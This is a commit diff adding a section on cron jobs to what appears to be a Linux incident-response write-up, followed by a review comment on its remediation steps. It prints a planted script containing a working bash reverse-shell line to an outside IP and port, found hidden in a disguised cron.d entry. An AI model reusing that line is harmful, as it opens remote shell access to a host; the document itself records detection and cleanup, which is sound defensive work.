Cronjob done
parent
0c57c12ac8
commit
fae286bc42
|
@ -481,5 +481,46 @@ root@ls-2024-9:/etc/unbound/unbound.conf.d# systemctl restart unbound
|
||||||
|
|
||||||
This is all I found suspicious in the DNS configuration.
|
This is all I found suspicious in the DNS configuration.
|
||||||
|
|
||||||
|
### Cron
|
||||||
|
|
||||||
|
Susipicious cron jobs:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
root@ls-2024-9:/etc/cron.d# cat e2scrub_all
|
||||||
|
MAILTO=""
|
||||||
|
30 3 * * 0 root test -e /run/systemd/system || SERVICE_MODE=1 /usr/lib/x86_64-linux-gnu/e2fsprogs/e2scrub_all_cron
|
||||||
|
10 3 * * * root test -e /run/systemd/system || SERVICE_MODE=1 /sbin/e2scrub_all -A -r
|
||||||
|
5-55/10 * * * * root test -e /run/systemd/system || SERVICE_MODE=1 /sbin/xfsscrub_all -A -r
|
||||||
|
```
|
||||||
|
|
||||||
|
The third script has a reverse shell in it:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
root@ls-2024-9:/etc/cron.d# cat /sbin/xfsscrub_all
|
||||||
|
#!/bin/bash
|
||||||
|
/bin/bash -i >& /dev/tcp/138.68.128.150/8080 || true >> /dev/null 0>&1 2>&1
|
||||||
|
```
|
||||||
|
|
||||||
|
Remove the entry from the cron.
|
||||||
|
And restart the cron service.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
root@ls-2024-9:/etc/cron.d# systemctl restart cron
|
||||||
|
```
|
||||||
|
|
||||||
|
And checked this one it is also safe:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
root@ls-2024-9:/etc/cron.d# cat sysstat
|
||||||
|
# The first element of the path is a directory where the debian-sa1
|
||||||
|
# script is located
|
||||||
|
PATH=/usr/lib/sysstat:/usr/sbin:/usr/sbin:/usr/bin:/sbin:/bin
|
||||||
|
|
||||||
|
# Activity reports every 10 minutes everyday
|
||||||
|
5-55/10 * * * * root command -v debian-sa1 > /dev/null && debian-sa1 1 1
|
||||||
|
|
||||||
|
# Additional run at 23:59 to rotate the statistics file
|
||||||
|
59 23 * * * root command -v debian-sa1 > /dev/null && debian-sa1 60 2
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
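Review bot: At "Remove the entry from the cron.", the remediation stops at the crontab line and `systemctl restart cron`, while `/sbin/xfsscrub_all` itself stays on disk and the step shows neither the command used nor the resulting file. Suggest documenting the removal the same way as the other steps (the `e2scrub_all` file after the edit), recording the script's owner, timestamps and hash before deleting it, and checking the host for existing connections to 138.68.128.150:8080. The section should also state that the first two entries in `e2scrub_all` were judged legitimate, since "it is also safe" before the `sysstat` listing has nothing to refer back to, and it should note that only files under /etc/cron.d are shown, so /etc/crontab, per-user crontabs and systemd timers are not covered here. Minor: the `test -e /run/systemd/system ||` guard means the right-hand command only runs when that path is absent, which is worth stating given that the host is managed with systemctl; "Susipicious" should read "Suspicious".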